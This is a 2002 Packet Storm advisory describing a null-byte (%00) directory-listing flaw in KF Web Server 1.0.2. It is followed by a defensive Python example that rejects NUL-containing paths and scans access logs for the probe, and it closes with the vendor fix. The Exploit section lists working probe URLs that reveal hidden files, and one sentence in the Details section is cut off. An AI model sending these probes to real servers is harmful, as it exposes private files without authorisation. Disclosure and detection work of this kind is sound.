Type packetstorm
Reporter Arnaud Jacques
Modified 2002-07-08T00:00:00


KF Web Server version 1.0.2 shows file and directory content
.oO Overview Oo.  
KF Web Server version 1.0.2 shows file and directory content  
Discovered on July 2nd, 2002
Vendor: KeyFocus (http://www.keyfocus.net/kfws/)  
KF Web Server 1.0.2 is a free personal web server available for Windows 98, ME, 2000 and XP. This web server can be made to show file and directory content.
.oO Details Oo.  
If the requested URL contains a %00 after a directory name, the server returns a listing of every file in that directory.
A hacker can see all hidden (non-HTML linked) files and directories on the   
.oO Exploit Oo.  
The exploit is very easy and can be reproduced with any browser.
Examples:
http://server_name/index.html : normal use.
http://server_name/%00 : triggers the vulnerability.
http://server_name/index.html%00 : is *not* vulnerable.
http://server_name/%00index.html : triggers the vulnerability; in fact everything after %00 is ignored.
http://server_name/subdir/%00 : triggers the vulnerability.
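For defenders, the examples above translate into two checks: a server must refuse any request path that decodes to a NUL byte instead of truncating at it, and the same test over access logs flags probes for this bug. The following is an added example, not code from the advisory or from KeyFocus; the log lines are constructed here in Common Log Format.

```python
"""Added example, not from the advisory: strict request-path decoding plus a
scan of access-log lines (constructed here, Common Log Format) for the %00
probe described above."""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_to_bytes

def strict_decode_path(raw_path: str) -> Optional[bytes]:
    """Percent-decode once and refuse any NUL byte. KFWS 1.0.2 truncated the
    path at the NUL and listed the directory in front of it; the safe
    behaviour is to reject such a request before it reaches the filesystem."""
    decoded = unquote_to_bytes(raw_path)
    return None if b"\x00" in decoded else decoded

def is_null_byte_probe(raw_path: str) -> bool:
    """True when the request path decodes to something containing NUL."""
    return strict_decode_path(raw_path) is None

# CLF: client ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def scan_access_log(lines: List[str]) -> List[Tuple[str, str, int]]:
    """Return (client, raw path, status) for each request carrying a NUL probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:  # not a CLF line; skip rather than crash
            continue
        if is_null_byte_probe(m.group("path")):
            hits.append((m.group("ip"), m.group("path"), int(m.group("status"))))
    return hits

# Constructed sample: the advisory's five example requests plus a junk line.
# /index.html%00 is flagged as well: a NUL in a request path is never
# legitimate, even where this particular server did not list for it.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Jul/2002:10:00:01 +0200] "GET /index.html HTTP/1.0" 200 1234',
    '10.0.0.5 - - [02/Jul/2002:10:00:02 +0200] "GET /%00 HTTP/1.0" 200 5120',
    '10.0.0.5 - - [02/Jul/2002:10:00:03 +0200] "GET /index.html%00 HTTP/1.0" 404 210',
    '10.0.0.5 - - [02/Jul/2002:10:00:04 +0200] "GET /%00index.html HTTP/1.0" 200 5120',
    '10.0.0.5 - - [02/Jul/2002:10:00:05 +0200] "GET /subdir/%00 HTTP/1.0" 200 3071',
    'not a log line',
]

if __name__ == "__main__":
    for client, path, status in scan_access_log(SAMPLE_LOG):
        print(f"NUL-byte probe from {client}: {path} -> {status}")
```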
.oO Solution Oo.  
The vendor has been informed and has solved the problem.
Upgrade to KF Web Server version 1.0.3.
.oO Discovered by Oo.  
Arnaud Jacques aka scrap